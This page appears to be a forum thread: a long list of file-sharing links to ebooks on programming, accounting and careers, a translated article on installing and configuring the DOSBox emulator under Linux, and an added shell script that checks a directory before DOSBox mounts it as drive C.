http://www.2shared.com/document/Lkan2vaD/Perl_H_-_Solutions_ti_exercise.html Pascal : Download : http://www.2shared.com/document/xK9djb-r/Pascal__Guida.html Download : http://www.2shared.com/document/upc2sMkK/StartProgUsingPascal.html C++ : Download : 
http://www.2shared.com/document/7pd1EwkN/C_Essentials.html Download : http://www.2shared.com/document/8uqBP3Z5/An_Overview_of_the_C_Programmi.html Download : http://www.2shared.com/file/c0MQqPNt/C__1.html Download : http://www.2shared.com/file/HFTD6AeU/CPPCourse.html Download : http://www.2shared.com/document/KYaD3qun/C1_online.html Download : http://www.2shared.com/document/48FbQunk/C2_online.html Download : http://www.2shared.com/document/KURAMRd5/C3_online.html Download : http://www.2shared.com/document/hDbccHnq/C4_online.html Download : http://www.2shared.com/document/VZ6QxVx1/C5_online.html Download : http://www.2shared.com/document/fOFVL04i/C6_online.html Download : http://www.2shared.com/document/QkxwDMYM/C7_online.html Download : http://www.2shared.com/document/KPee1b-C/C8_online.html Download : http://www.2shared.com/document/b6yk5M_T/C9_online.html Download : http://www.2shared.com/document/QSyZ22jT/C10.html Download : http://www.2shared.com/document/vCeTYriC/C11.html Download : http://www.2shared.com/document/GZOE3QuT/C12.html Download : http://www.2shared.com/document/wqbQ_Gxp/C13.html Download : http://www.2shared.com/document/RMUnuyGe/C14.html C++ Tutorials : Download : http://www.2shared.com/document/RbDhWjUB/tutorial_c.html Download : http://www.2shared.com/document/3g_uqIHJ/cunleashed.html View : http://www.glenmccl.com/tutor.htm View : http://www.softwaretrainingtutorials.com/c-plus-plus.php UML : Download : http://www.2shared.com/document/LifK9g2U/UMLProcess.html Download : http://www.2shared.com/document/jBmrXuXl/CommNetwork.html Download : http://www.2shared.com/document/WFOGKjLy/UML_-_A_Profile_for_Integratin.html Download : http://www.2shared.com/document/aUBdy2TL/UML_-_A_UML_Profile_for_Extern.html Download : http://www.2shared.com/document/opSvGAIN/UML_-_Building_a_UML_Profile_f.html All Visual Basic : Download : http://www.2shared.com/document/UsDWTg5Q/Visual_Basic_Programs.html Download : 
http://www.2shared.com/document/erjo8IGU/Class1.html Download : http://www.2shared.com/document/PuZ0Dn6w/Class2.html Download : http://www.2shared.com/document/3K9UbS4_/Class3.html Download : http://www.2shared.com/document/Tfv65L7D/Class4.html Download : http://www.2shared.com/document/25KZ25jD/Class5.html Download : http://www.2shared.com/document/KUL9dACG/Contents.html Download : http://www.2shared.com/document/k5ELwugf/StartHere.html 60+ Free programming books for C, C++, C# - http://itdiscover.com/links/free-c-c-sharp-c-plus-plus-books-online-programming Python : Download : http://www.2shared.com/document/5Fj98mSo/An_Introduction_to_Python.html Download : http://www.2shared.com/document/lwRCAfew/DesignPatternsInPython_ver01.html Download : http://www.2shared.com/document/FUgtqSHd/Python_-_Biginner.html Download : http://www.2shared.com/document/lJcun_XY/Python_-_Code_Breaker.html Download : http://www.2shared.com/document/Pl8fMzoz/Python_-_Making_games.html Download : http://www.2shared.com/document/uC9l75FE/Python.html Cyber psychology : Download : http://www.2shared.com/document/JQK48cRU/Cyber_-_Psychology_-_Modern_Co.html Download : http://www.2shared.com/document/nkFVJTyy/Cyber_-_Psychology_-_Modern_Co.html Download : http://www.2shared.com/document/zIiU5B49/Cyber_-_Psychology_-_Modern_Co.html Download : http://www.2shared.com/document/eUXLmwMI/Cyber_-_Psychology_-_Modern_Co.html Download : http://www.2shared.com/document/ApV3KXQy/Cyber_-_Psychology_-_Modern_Co.html Download : http://www.2shared.com/document/ri3-JNC4/Cyber_-_Psychology_-_Modern_Co.html Human psychology : Download : http://www.2shared.com/document/N7tPSoNQ/Psychilogy_-_A_Place_Called_Ze.html Download : http://www.2shared.com/document/W1LhlZEY/Psychology_-_10_great_ways_to_.html Download : http://www.2shared.com/document/9f6jpuFd/Psychology_-_All_Is_Mind.html Download : http://www.2shared.com/document/VtQLsqge/Psychology_-_Anxiety__Panic_At.html Download : 
http://www.2shared.com/document/ZiG0WbQB/Psychology_-_Assault_on_the_So.html Download : http://www.2shared.com/document/fAag0zUC/Psychology_-_Bens_Story_A_Chil.html Download : http://www.2shared.com/document/4yQXuqPe/Psychology_-_Body_Language_Sec.html Download : http://www.2shared.com/document/NjF8G9Rx/Psychology_-_Discover_the_Secr.html Download : http://www.2shared.com/document/dE7bLu9i/Psychology_-_Turning_dreams_in.html Electronica IT : Download : http://www.2shared.com/document/5mO2UJk7/Electronica_electrical-power__.html Download : http://www.2shared.com/document/5mO2UJk7/Electronica_electrical-power__.html Download : http://www.2shared.com/document/mCvBcVdW/Electronica_electrical-power__.html Download : http://www.2shared.com/document/eX2Cwhe1/Electronica_electrical-power__.html Download : http://www.2shared.com/document/anWnTvWA/Electronica_electrical-power__.html Download : http://www.2shared.com/document/cDecXA9R/Electronica_electrical-power__.html Download : http://www.2shared.com/document/Ce3NB3w2/Electronica_electrical-power__.html Download : http://www.2shared.com/document/Nz-Rq1Nt/Electronica_electrical-power__.html Download : http://www.2shared.com/document/Cz8hV0El/Electronica_electrical-power__.html Download : http://www.2shared.com/document/8ESmWaGl/Electronica_electrical-power__.html Download : http://www.2shared.com/document/-OyxYVc8/Electronica_electrical-power__.html Download : http://www.2shared.com/document/sn3syHHv/Electronica_electrical-power__.html Download : http://www.2shared.com/document/PvXl6Zp-/Electronica_electrical-power__.html Download : http://www.2shared.com/document/cOsOp4wd/Electronica_electrical-power__.html Download : http://www.2shared.com/document/7DMZmTPs/Electronica_electrical-power__.html Download : http://www.2shared.com/document/jj1t2Wbn/Electronica_electrical-power__.html Download : http://www.2shared.com/document/d2ixXLYB/Electronica_electrical-power__.html Download : 
http://www.2shared.com/document/L-FgJBE4/Electronica_electrical-power__.html Download : http://www.2shared.com/document/Gv7CycKL/Electronica_electrical-power__.html LINUX : Download : http://www.2shared.com/document/LAyjOkVP/GNU-Linux-Tools-Summary.html Download : http://www.2shared.com/document/mh5hZYES/Introduction_-_LINUX.html Download : http://www.2shared.com/file/ciwue6HG/LINUX_COMMANDS.html Download : http://www.2shared.com/document/DIIej99r/linux_starter_pack.html Download : http://www.2shared.com/document/VyaKN0vj/producingoss.html Download : http://www.2shared.com/document/2eICc9dq/ubuntupocketguide-v1-1.html Algorithms : Download : http://www.2shared.com/document/ZuunFjqx/Algorithms_and_Complexity.html Download : http://www.2shared.com/document/kr1FUXeB/Information_Theory_Inference_a.html ProgrammingGroundUp : Download : http://www.2shared.com/document/diGXBmzg/ProgrammingGroundUp-0-8.html Download : http://www.2shared.com/document/3bYi5a_n/ProgrammingGroundUp-0-9.html Download : http://www.2shared.com/document/plMx7TsE/ProgrammingGroundUp-1-0-booksi.html Interrupt list : Download : http://www.2shared.com/file/iGqKD41g/Interrupt_list.html The art of assembly language programming : Download : http://www.2shared.com/file/DLc5Te7k/The_art_of_assembly_language_p.html HTML & CSS : http://my.safaribooksonline.com/book/web-development/html/9781118206911/firstchapter In this PDF you will find examples and books for almost all programming languages : Download : http://www.2shared.com/document/NVTEFFu3/books.html Videos : http://my.safaribooksonline.com/9780137045150 C++ : http://my.safaribooksonline.com/9780137045150 Visual studio 2010 : http://my.safaribooksonline.com/9780137045150 Proxy : Download : http://www.2shared.com/document/SfNmTB_6/0309102251.html Download : http://www.2shared.com/document/nhhETZZ6/Earnings_Magic_and_the_Unbalan.html Download : http://www.2shared.com/document/AAOdcina/Firewalls_-_Jumpstart_for_Netw.html New - Books for your personal 
develpment : Download : http://www.2shared.com/document/HnTcyVS1/career-secrets-exposed1__1_.html Download : http://www.2shared.com/document/jEpe8hT-/career-secrets-exposed1__2_.html Download : http://www.2shared.com/document/F1dXcviq/career-secrets-exposed1__3_.html Download : http://www.2shared.com/document/_x1qAraw/career-secrets-exposed1__4_.html Download : http://www.2shared.com/document/M_6dZcDS/career-secrets-exposed1__5_.html Download : http://www.2shared.com/document/bIvFC5Jw/career-secrets-exposed1__6_.html Download : http://www.2shared.com/document/NSx9_zBF/career-secrets-exposed1__7_.html Download : http://www.2shared.com/document/qnj9xwBL/career-secrets-exposed1__8_.html Download : http://www.2shared.com/document/5Lf5Dv6w/career-secrets-exposed1__9_.html Download : http://www.2shared.com/document/reTqupG0/career-secrets-exposed1__10_.html Download : http://www.2shared.com/document/zpP5wEkL/career-secrets-exposed1__11_.html Download : http://www.2shared.com/document/uRiXnw4I/career-secrets-exposed1__12_.html Download : http://www.2shared.com/document/GY7y_ssV/career-secrets-exposed1__13_.html Download : http://www.2shared.com/document/HijZv24K/career-secrets-exposed1__14_.html Download : http://www.2shared.com/document/8tqIhOub/career-secrets-exposed1__15_.html Download : http://www.2shared.com/document/oA2bPH8z/career-secrets-exposed1__16_.html Download : http://www.2shared.com/document/GKuHmzKs/career-secrets-exposed1__17_.html Download : http://www.2shared.com/document/Vw9aytS1/career-secrets-exposed1__18_.html Download : http://www.2shared.com/document/fnBH2AeT/career-secrets-exposed1__19_.html PowerPoint : Download : http://www.2shared.com/document/dCdR0SMm/powerpoint-2010-advanced.html Excel : Download : http://www.2shared.com/document/pT_03lz9/excel-2010-advanced.html Accounting : Download : http://www.2shared.com/document/EUlp0UVS/accounting-cycle-exercises-i.html Download : 
http://www.2shared.com/document/CoE-CJR2/accounting-cycle-exercises-ii.html Download : http://www.2shared.com/document/Zv8N961U/accounting-cycle-exercises-iii.html Download : http://www.2shared.com/document/A7312zjD/accounting-cycle-exercises-iv.html Download : http://www.2shared.com/document/3ToqJ_F4/basics-of-international-financ.html Download : http://www.2shared.com/document/DIDsqJGZ/berliner-balanced-scorecard.html Download : http://www.2shared.com/document/flOu6fbE/berliner-balanced-scorecard-cu.html Download : http://www.2shared.com/document/zgpPOpM5/budgeting-and-decision-making.html Download : http://www.2shared.com/document/yJ3TVzxB/budgeting-and-decision-making-.html Download : http://www.2shared.com/document/azw1Dr5w/budgeting-and-decision-making-.html Download : http://www.2shared.com/document/7OTQrN2Z/budgeting-and-decision-making-.html Download : http://www.2shared.com/document/11vMtHvu/corporate-valuation-and-takeov.html Download : http://www.2shared.com/document/Yk4L4zLD/corporate-valuation-and-takeov.html Download : http://www.2shared.com/document/Z2qmdaFa/current-assets.html Download : http://www.2shared.com/document/B3jgsEnK/current-assets-exercises-1.html Download : http://www.2shared.com/document/Y75ctQCK/current-assets-exercises-ii.html Download : http://www.2shared.com/document/HZpYXF47/current-assets-exercises-iii.html Download : http://www.2shared.com/document/skFsNJq5/current-assets-exercises-iv.html Download : http://www.2shared.com/document/F6HNs0fe/financial-econometrics-eviews.html Download : http://www.2shared.com/document/HN8s-QaV/dynamic-costing.html Download : http://www.2shared.com/document/yEKp70Fo/liabilities-and-equity.html Download : http://www.2shared.com/document/1HHbmuSc/liabilities-and-equity-exercis.html Download : http://www.2shared.com/document/8QGo-Np_/liabilities-and-equity-exercis.html Download : http://www.2shared.com/document/sXkVGUNN/liabilities-and-equity-exercis.html Download : 
http://www.2shared.com/document/gGzllYEI/long-term-assets.html Download : http://www.2shared.com/document/cegguDTu/long-term-assets-exercises-i.html Download : http://www.2shared.com/document/um9ggRnX/long-term-assets-exercises-ii.html Download : http://www.2shared.com/document/rG-aBlC2/long-term-assets-exercises-iii.html Download : http://www.2shared.com/document/kyrOja2b/managerial-and-cost-accounting.html Download : http://www.2shared.com/document/hcI6tKAe/managerial-and-cost-accounting.html Download : http://www.2shared.com/document/LaZyIici/managerial-and-cost-accounting.html Download : http://www.2shared.com/document/TwxPNrwz/portfolio-theory-financial-ana.html Download : http://www.2shared.com/document/46gzGnIx/strategic-financial-management.html Download : http://www.2shared.com/document/kHTRk3gY/strategic-financial-management.html Download : http://www.2shared.com/document/1DyD4rJD/the-accounting-cycle.html Download : http://www.2shared.com/document/DctzHqYh/using-accounting-information.html Download : http://www.2shared.com/document/6NCQ6IgU/using-accounting-information-e.html Download : http://www.2shared.com/document/_4lZVUyR/using-accounting-information-e.html Accounting videos : http://bookboon.com/en/textbooks/accounting-video IT & Programming : Download : http://www.2shared.com/document/cHkyy_H1/access-2010-part-i.html Download : http://www.2shared.com/document/JNwwzIXL/access-2010-part-ii.html Download : http://www.2shared.com/document/vUZHQzeA/access-2010-part-iii.html Download : http://www.2shared.com/document/ZLFFNWtj/an-introduction-of-java-progra.html Download : http://www.2shared.com/document/pLgXyoOL/access-2010-part-iv.html Download : http://www.2shared.com/document/fFXEfPZq/an-introduction-to-java-progra.html Download : http://www.2shared.com/document/7OqR4WMn/an-introduction-to-java-progra.html Download : http://www.2shared.com/document/_PyI3IuT/an-introduction-to-relational-.html Download : 
http://www.2shared.com/document/Q60B75sE/applications-of-prolog.html Download : http://www.2shared.com/document/oEZMJPvy/artificial-intelligence-agent-.html Download : http://www.2shared.com/document/jUyVQVh6/artificial-intelligence-agents.html Downlaod : http://www.2shared.com/document/exgMeBLW/artificial-intelligence-exerci.html Download : http://www.2shared.com/document/Sr-9dvBq/control-engineering-matlab.html Download : http://www.2shared.com/document/zUc2jA5H/c-programming-in-linux.html Download : http://www.2shared.com/document/OMhsxBq1/digital-image-processing-part-.html Download : http://www.2shared.com/document/7zgBdRsW/digital-image-processing-part-.html Download : http://www.2shared.com/document/UZ5G5h09/digital-systems-design.html Download : http://www.2shared.com/document/q4i6QBk6/excel-2010-advanced.html Download : http://www.2shared.com/document/EF4gINn4/excel-2010-introduction-part-i.html Download : http://www.2shared.com/document/3Zpvxjrv/excel-2010-introduction-part-i.html Download : http://www.2shared.com/document/a_v15o5T/fundamentals-of-media-security.html Download : http://www.2shared.com/document/pdsN6TfE/gentle-introduction-to-mathema.html Download : http://www.2shared.com/document/SyKRGYMN/introduction-to-biological-sig.html Download : http://www.2shared.com/document/jf5xQ3b6/introduction-to-digital-signal.html New 2 - Business strategy : Download : http://www.2shared.com/document/pzlnWYTR/business-models.html Download : http://www.2shared.com/document/GnohDt82/company-valuation-and-share-pr.html Download : http://www.2shared.com/document/pDt2Xe4l/company-valuation-and-takeover.html Download : http://www.2shared.com/document/ZTBT02LS/corporate-valuation-and-takeov.html Download : http://www.2shared.com/document/NElSWILR/corporate-valuation-and-takeov.html Download : http://www.2shared.com/document/O7NY3jxD/operations-strategy.html Download : http://www.2shared.com/document/xhxGQLcA/strategic-financial-management.html Download : 
http://www.2shared.com/document/fmFDS3H6/strategic-financial-management.html Download : http://www.2shared.com/document/kcBZOwNP/strategicmanagement.html Download : http://www.2shared.com/document/h8J-3iAn/strategic-marketing.html Download : http://www.2shared.com/document/DZsJKuJi/studying-strategy.html Download : http://www.2shared.com/document/eqTJmBJY/thinking-strategically.html Nanotechnology : Download : http://www.2shared.com/document/KuRiQQmQ/micro-and-nano-transport-of-bi.html Download : http://www.2shared.com/document/Y9rnu0Te/nano-technology.html New 3 - Career Secrets & Networking Download : http://www.2shared.com/document/KJjFQXbA/career-secrets-exposed.html Download : http://www.2shared.com/document/94LNW4Jl/creating-your-cv-as-a-self-mar.html Download : http://www.2shared.com/document/ob2GXmYl/demystifying-case-interviews.html Download : http://www.2shared.com/document/wnazutG0/essential-job-searching-tools.html Download : http://www.2shared.com/document/qyQ43jyD/graduate-employment-333-tips-f.html Download : http://www.2shared.com/document/dXY59F4-/ignite-your-career.html Download : http://www.2shared.com/document/UQ8lB-CM/interview-secrets-exposed.html Download : http://www.2shared.com/document/xGgx4WVn/managing-your-career.html Download : http://www.2shared.com/document/sk8XsEgK/mba-education.html Download : http://www.2shared.com/document/K4ZcoSkd/networking-english.html Download : http://www.2shared.com/document/zVsM7Nt-/planning-for-new-opportunities.html Download : http://www.2shared.com/document/Th5IHTYx/resume-secrets-exposed.html Download : http://www.2shared.com/document/UfcXWtM7/stress-measurement-in-less-tha.html Download : http://www.2shared.com/document/nEtVg0fb/the-fastest-way-to-the-job-int.html Download : http://www.2shared.com/document/BpBWcggG/time-to-get-hired.html Download : http://www.2shared.com/document/LcwqVeEl/working-abroad.html Download : http://www.2shared.com/document/MC_Ff_XW/working-abroad-european-perspe.html New 4 
- Statistics : Download : http://www.2shared.com/document/zrhT9w0U/statistics-compendium.html Download : http://www.2shared.com/document/A8hvixUX/statistics-exercise-book.html Download : http://www.2shared.com/document/Cudi-flF/statistics-for-business-and-ec.html Download : http://www.2shared.com/document/MdZM5XYD/statistics-for-health-life-and.html Download : http://www.2shared.com/document/mqQLTFY6/stats-practically-short-and-si.html Download : http://www.2shared.com/document/boK3l-wI/stress-measurement-in-less-tha.html Petroleum, Gas & Oil download books I will update this thread over time
-
Emulating DOS on LINUX

Anyone who started using a PC at least fifteen years ago cannot help feeling a certain nostalgia for their first operating system, which for many was DOS. There are some programs we were fond of that, inevitably, we can no longer use, because they are no longer supported by modern operating systems. Certain video games naturally fall into this category, from a time when they were a new kind of entertainment.

Fans of Super Mario, Lemmings and Pacman will be delighted to know that there is a project that aims to emulate a PC, even on Linux, and offers users an operating system fully compatible with DOS. It is DOSBox (DOSBox, an x86 emulator with DOS), a project based on DOSEMU (DOSEMU Main Page), designed explicitly to make it possible to run old games orphaned by this operating system.

A very interesting feature of this program is that it can run on the most popular operating systems: Windows, MacOSX, Linux, FreeBSD, and even BeOS and the now-retired OS/2. The system requirements are relatively high: a processor with a clock speed of at least 1 GHz is recommended, since some games will work only with more powerful hardware.

After you launch the executable, a DOS session starts in a window, complete with boot and initialization of devices such as the sound card. The prompt is exactly like the one used by DOS, and alongside its commands you can use some DOSBox commands to interact with the operating system from which it was launched (GNU/Linux, in our case), for instance to associate a particular directory with a drive letter.

Personally I have found DOSBox very useful for a wide range of applications, not games, that I needed to run under Linux. Lately, for example, I found it very useful for trying out an old assembler, as well as a whole series of programs that are no longer developed but that can be handy to have available from time to time. It could be very useful, for example, for those computer labs that are obliged to use some software that runs under DOS. If at first sight this may have seemed a good excuse to stay away from GNU/Linux, now with DOSBox (and DOSEMU, from which it derives) it no longer is.

In the next part of the article we will see how to configure this program and examine the commands its interface has to offer.

In the first part of the article we looked at the potential offered by DOSBox. Now it is time to see it in action. We start with installation: your distribution very likely already has official pre-compiled packages in its own repositories. On Debian and Ubuntu, just run (as usual), as root:

apt-get update
apt-get install dosbox

DOSBox, while it has much in common with DOSEMU, is much easier to configure and use, and is already geared toward use in the field of "entertainment". It is also more complex, since it provides CPU emulation as well and does not merely imitate a DOS operating system.

Then move on to configuration. DOSBox settings can be changed through a configuration file. This step is not required, however, since the default settings will be fine in most cases. What we will look at are the options that can be given at run time.

Open a terminal and launch DOSBox without any parameters. It will start and present a prompt with the letter Z:\. Under DOS we would usually see C rather than Z. The reason is simple, and it has to do with the security of your data. Z: means that we are not looking at the files on a partition (to put it simply), but at the file system. At this point it is up to the user which directory to make visible in DOSBox, but keep in mind that we are giving free access to our files to the DOS applications we launch. Something can always go wrong: an error (let us say a bad one) can always be lurking, and our files can come to harm. You should therefore choose carefully what you want to do, probably putting everything under a specially created directory.

At this point we would like to do something, namely run programs. Suppose we have files in the directory /home/user/DOS and want to make this directory visible as drive C. From the DOS prompt displayed when DOSBox starts:

mount C "/home/utente/DOS"

At this point we can access drive C with the classic C: and run our DOS command.

I did notice, however, a certain incompatibility between DOSBox and the Italian keyboard (to be honest, with all keyboards that are not American). It makes it impossible to type special characters such as the colon (:) or the slash (/). The problem can be solved in several ways: the simplest and least elegant is to change the keyboard layout under X by running setxkbmap us from the terminal before starting DOSBox. The layout will then be that of an American keyboard, which is recognized correctly. Alternatively, we can start DOSBox and, using CTRL+F1, launch the keymapper, a utility for changing the keyboard layout. Another possibility is to use KEYB from the FreeDOS project, the DOS program for changing the keyboard layout.

A very convenient DOSBox option is -c: with it, you can run a command immediately after launch. For example, if we launched from the terminal:

dosbox -c "MOUNT C /home/utente/DOS"

This will start our program with the directory /home/user/DOS already associated with drive C.

At this point all that remains is to dust off some old floppy in search of a game left abandoned in a drawer for too long.
http://www.html.it/articoli/emulare-dos-in-linux-1/
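
The post's advice to expose only a specially created directory to DOS programs can be enforced before the mount happens. The script below is an added example, not part of the original post or of DOSBox itself; the function names are hypothetical and it assumes a POSIX shell with `readlink -f` available.

```shell
#!/bin/sh
# Added example (not from the original post): vet a directory before it is
# handed to DOSBox as drive C. Function names are hypothetical.

# dos_dir_is_safe DIR
# Succeeds only if DIR exists, is not "/", is not $HOME or a parent of $HOME,
# and contains no symlink that resolves outside DIR. The host OS follows
# symlinks, so a link inside the mounted tree would expose outside files.
dos_dir_is_safe() {
    [ -d "$1" ] || return 1
    dds_real=$(cd "$1" && pwd -P) || return 1
    dds_home=$(cd "${HOME:-/}" && pwd -P) || return 1

    # Reject "/" and any directory that is $HOME or contains $HOME.
    case "$dds_home/" in
        "${dds_real%/}/"*) return 1 ;;
    esac

    # Reject symlinks whose resolved target lies outside the directory.
    find "$dds_real" -type l | while IFS= read -r dds_link; do
        dds_target=$(readlink -f "$dds_link") || exit 1
        case "$dds_target/" in
            "$dds_real/"*) ;;
            *) exit 1 ;;
        esac
    done || return 1
    return 0
}

# dosbox_mount_cmd DIR
# Prints the MOUNT command for DOSBox's -c option, using the resolved path.
dosbox_mount_cmd() {
    dmc_real=$(cd "$1" && pwd -P) || return 1
    printf 'MOUNT C "%s"\n' "$dmc_real"
}

# launch_dosbox DIR
# Starts DOSBox with DIR mounted as C only when the directory passes the check.
launch_dosbox() {
    if ! dos_dir_is_safe "$1"; then
        echo "refusing to mount '$1' as drive C" >&2
        return 1
    fi
    dosbox -c "$(dosbox_mount_cmd "$1")" -c "C:"
}

# Usage: launch_dosbox "$HOME/DOS"
```

The check is point-in-time: a symlink created after launch is not caught, so the directory should be writable only by the account running DOSBox.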